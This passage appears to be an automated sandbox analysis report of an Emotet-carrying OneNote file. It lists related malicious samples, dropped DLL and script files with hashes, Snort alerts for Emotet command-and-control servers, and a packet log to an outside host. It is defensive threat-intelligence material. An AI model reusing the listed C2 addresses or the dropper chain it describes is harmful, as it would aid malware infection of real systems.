	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	100935929722734787.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	355444649229343017.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2961883463791890566.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	1002112025749539431938.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Dokumente_2023.16.03_1155.one	Get hash	malicious	Emotet	Browse	203.26.41.131

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RACKCORP-APRackCorpAU	OMICS.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_International.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	opastonline.com.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	100935929722734787.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	355444649229343017.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2961883463791890566.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	1002112025749539431938.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Dokumente_2023.16.03_1155.one	Get hash	malicious	Emotet	Browse	110.232.117.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	aRThcK3rSO.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader	Browse	203.26.41.131
	click.wsf	Get hash	malicious	Emotet	Browse	203.26.41.131
	setup.exe	Get hash	malicious	Amadey, Djvu, RedLine, SmokeLoader	Browse	203.26.41.131
	purchase_order.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	203.26.41.131
	file.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	203.26.41.131
	setup.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131
	it2NFpv2yt.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131
	file.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	untitled_764875647.one	Get hash	malicious	Emotet	Browse	203.26.41.131

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	100935929722734787.one	Get hash	malicious	Emotet	Browse
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse
	355444649229343017.one	Get hash	malicious	Emotet	Browse
	2961883463791890566.one	Get hash	malicious	Emotet	Browse
	1002112025749539431938.one	Get hash	malicious	Emotet	Browse
	Dokumente_2023.16.03_1155.one	Get hash	malicious	Emotet	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62582
Entropy (8bit):	7.996063107774368
Encrypted:	true
SSDEEP:	1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
MD5:	E71C8443AE0BC2E282C73FAEAD0A6DD3
SHA1:	0C110C1B01E68EDFACAEAE64781A37B1995FA94B
SHA-256:	95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
SHA-512:	B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
Malicious:	false
Preview:	MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k....Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G\|.[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1274376123142225
Encrypted:	false
SSDEEP:	6:kKH4ry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:fwCvkPlE99SNxAhUext
MD5:	86D7AB5209F501EDFCFD1ED207DF126C
SHA1:	2181F1CC59070F56FFA68F1D923ABA7F05232413
SHA-256:	ABCD9709266E0713C5D2025ACEF9A7CA53A40E3F471829B117C50FAEC4B29ABB
SHA-512:	F55DED735B5E640899CBEFA0013E90E10F9D68E27EFDD6BA2FF505656A5520BAE0AA40EAC9769E1CFFC5E7C1BE523CD35155E82E81007F70E01BF53AFE67DDE5
Malicious:	false
Preview:	p...... ........*....X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) p\004, numeric, rows 262223750, columns 0
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.106463217645438
Encrypted:	false
SSDEEP:	3:ulX1EA8TXlRRRllRlAaRtl:Kx8T5zX
MD5:	F8DDA9F4FA66E49DF74640ED8AE2DD99
SHA1:	6CB54F6F5EDD5F075CA83CA91618A094DFD590EE
SHA-256:	B6A7101472003B8B01F4F68D685C5C8EAFA38FEF9D2F613C88487551EA80B998
SHA-512:	D4B4F7ABBB589E0FFD694C61785EEF90007605586656E946E5B13490977B9391624C3F3F77D6F6EFEF5E73238C69CFF947DD91FE4744AFF2AE3D06C02BBD77DA
Malicious:	false
Preview:	.....7..........$...p...............................4...................

C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.7025254221055496
Encrypted:	false
SSDEEP:	24:9Sey7sX9lL+5lwmPs+C9+r8b3+gd//7i64/QNgi2f1qvBIUxVrkviaoAWWcvrO8Y:Mey89sxE+m6taFRNgbEveUvSH9gK8lW
MD5:	E9B1EF3305AE282682EE76A7A2F2C852
SHA1:	E26EEA64296D7D3DEB29EABB86188114B18279E3
SHA-256:	F92F6088D7F7FFE2AEC559A475069790983385B898FB02BFA50BA89A9C585F96
SHA-512:	1C58413EA61FD7411C66AA822C7B98F43D23DE2F0AEB1CC71E3C99FFFA3DB3A22917EC59041DDC00106A9E351462E035190B28E62BBA89FA2CF31EA14AC210E5
Malicious:	false
Preview:	.@..`....................................................................................................@.......B......kQV.X..Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................m..h..... ......O..X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.............................................................................7.B.........17134.1.x86fre.rs4_release.180410-1804......$.@.........U......@..%\|n.z.....P:\Target\x86\ship\onenote\x-none\onmain.pdb.ain.pdb.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.............................................

C:\Users\user\AppData\Local\Temp\click.wsf

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:	3:tWn:tWn
MD5:	07F5A0CFFD9B2616EA44FB90CCC04480
SHA1:	641B12C5FFA1A31BC367390E34D441A9CE1958EE
SHA-256:	A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
SHA-512:	09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
Malicious:	true
Preview:	badum tss

C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: OMICS.one, Detection: malicious, Browse Filename: OPAST_GROUP_1.one, Detection: malicious, Browse Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse Filename: OPAST_GROUP.one, Detection: malicious, Browse Filename: Opast_International.one, Detection: malicious, Browse Filename: opastonline.com.one, Detection: malicious, Browse Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse Filename: Opast_Publishing_Group.one, Detection: malicious, Browse Filename: omicsonline.net.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse Filename: 2023-03-16_0923.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse Filename: 100935929722734787.one, Detection: malicious, Browse Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse Filename: 2023-03-16_1753.one, Detection: malicious, Browse Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse Filename: 355444649229343017.one, Detection: malicious, Browse Filename: 2961883463791890566.one, Detection: malicious, Browse Filename: 1002112025749539431938.one, Detection: malicious, Browse Filename: Dokumente_2023.16.03_1155.one, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	25280
Entropy (8bit):	0.5448857236903505
Encrypted:	false
SSDEEP:	48:InnYXroOkOOrUd+9olgk8Z4GQTaza2oLC:ICroAOg+6lAUaza2n
MD5:	6086328D237D6F15FF2C220161EDF1C6
SHA1:	D69F2D0534338DA593194D26865CA5138AD00072
SHA-256:	B685F13DDA1C89BB54C173FD26D49B6B92C9E47B653CC343ED8DBF6F1EB021E6
SHA-512:	20475A656849ECFD7EAE8E99607A024395A98D4537F4AFBC216427AE642320B064E074551B3AD97280DA977F90E715385FC763F446957A8FBB62942262985817
Malicious:	false
Preview:	.%c....L..=../\xO./. .D.V.....................?.....I...........................................................................................................h............................b...............uZ..MUM...Q..h1........mO%b..xE.,._................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.4737683251160396
Encrypted:	false
SSDEEP:	48:K8w0udO5NXWDglIFLbqzqgdCDDGTCDqnCpd5w0udO5NXWDglh7+5DGqzWk7dCDGn:RgD7UqfGZCpdgDfLZhPfs4
MD5:	E2CA57FD013574EE30FE50E44FF9733B
SHA1:	E051026CF722B0749E02DDD1B67FB66891F8B903
SHA-256:	FC94D2AE845B974DF3ED35A25D11886E1D176A6D545E90F01CFEFD31666596BD
SHA-512:	F3DC1177A2E17D569EC0D55D657F26C63E296F30F3F790F28DD1DCF45DD35141E8E96D938334F6C1A065887B2A9F00A673EA9EA673F80CAC927C90AF1867FC40
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{......X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U5m..PROGRA~2.........L.qV-A....................V......z..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV-A.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV-A.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV2A....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IOV5D23NX65BBX4TEENK.temp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.4737683251160396
Encrypted:	false
SSDEEP:	48:K8w0udO5NXWDglIFLbqzqgdCDDGTCDqnCpd5w0udO5NXWDglh7+5DGqzWk7dCDGn:RgD7UqfGZCpdgDfLZhPfs4
MD5:	E2CA57FD013574EE30FE50E44FF9733B
SHA1:	E051026CF722B0749E02DDD1B67FB66891F8B903
SHA-256:	FC94D2AE845B974DF3ED35A25D11886E1D176A6D545E90F01CFEFD31666596BD
SHA-512:	F3DC1177A2E17D569EC0D55D657F26C63E296F30F3F790F28DD1DCF45DD35141E8E96D938334F6C1A065887B2A9F00A673EA9EA673F80CAC927C90AF1867FC40
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{......X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U5m..PROGRA~2.........L.qV-A....................V......z..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV-A.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV-A.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV2A....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	6.730630226103355
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	Insight_Medical_Publishing.one
File size:	120428
MD5:	ff762b2f28c3bcaaabcc6f7656f92d50
SHA1:	9448c2d43c1e7155a4003d513c95f42fd29a2b7f
SHA256:	62ff7b52aeac2e32e59d8168cd55db1522de07833d476c8e26b36f40724bbebe
SHA512:	38f57c9b9df91396c4dc46284789cfc7af05db79f25adbd9a5387911a44eb65326685182860a420adb3b17657c6a82931d519fdeb0e653c663959fae557aa1ad
SSDEEP:	1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX7:1BoC+tCYvSMVnte8ZP1Y6JL
TLSH:	96C33BF1A8025C0AE123C976B1FB661399D052ED42283B2BF87D507DD978A20D5DD8EF
File Content Preview:	.R\{...M..Sx.).......i.E......&.................?......I...................................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4104.168.155.1434969680802404302 03/17/23-09:11:36.169787	TCP	2404302	ET CNC Feodo Tracker Reported CnC Server TCP group 2	49696	8080	192.168.2.4	104.168.155.143
192.168.2.491.121.146.474968680802404344 03/17/23-09:10:50.935597	TCP	2404344	ET CNC Feodo Tracker Reported CnC Server TCP group 23	49686	8080	192.168.2.4	91.121.146.47
192.168.2.4182.162.143.56496894432404312 03/17/23-09:11:04.665638	TCP	2404312	ET CNC Feodo Tracker Reported CnC Server TCP group 7	49689	443	192.168.2.4	182.162.143.56
192.168.2.466.228.32.314968870802404330 03/17/23-09:10:59.416914	TCP	2404330	ET CNC Feodo Tracker Reported CnC Server TCP group 16	49688	7080	192.168.2.4	66.228.32.31
192.168.2.4167.172.199.1654969180802404308 03/17/23-09:11:21.428977	TCP	2404308	ET CNC Feodo Tracker Reported CnC Server TCP group 5	49691	8080	192.168.2.4	167.172.199.165

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:10:03.572330952 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:03.572402954 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:03.572552919 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:03.577940941 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:03.577989101 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:04.202596903 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:04.203465939 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:04.214889050 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:04.214925051 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:04.215370893 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:04.263299942 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:04.473165035 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:04.473231077 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:05.955673933 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:05.955748081 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:05.955765963 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:05.955936909 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:05.955986023 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:05.997817993 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.247741938 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.247778893 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.247978926 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.248001099 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248080969 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.248141050 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248162031 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248186111 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248197079 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.248205900 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248249054 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.248265982 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.248286009 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.294729948 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.294780970 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.341589928 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.547575951 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.547640085 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.547830105 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.547863007 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586201906 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586244106 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586272001 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586350918 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586389065 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586411953 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586421967 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586436987 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586452007 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586469889 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586482048 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586503029 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586568117 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586581945 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586610079 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586615086 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586637020 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586647987 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586785078 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586801052 CET	443	49685	203.26.41.131	192.168.2.4
Mar 17, 2023 09:10:06.586850882 CET	49685	443	192.168.2.4	203.26.41.131
Mar 17, 2023 09:10:06.586865902 CET	443	49685	203.26.41.131	192.168.2.4
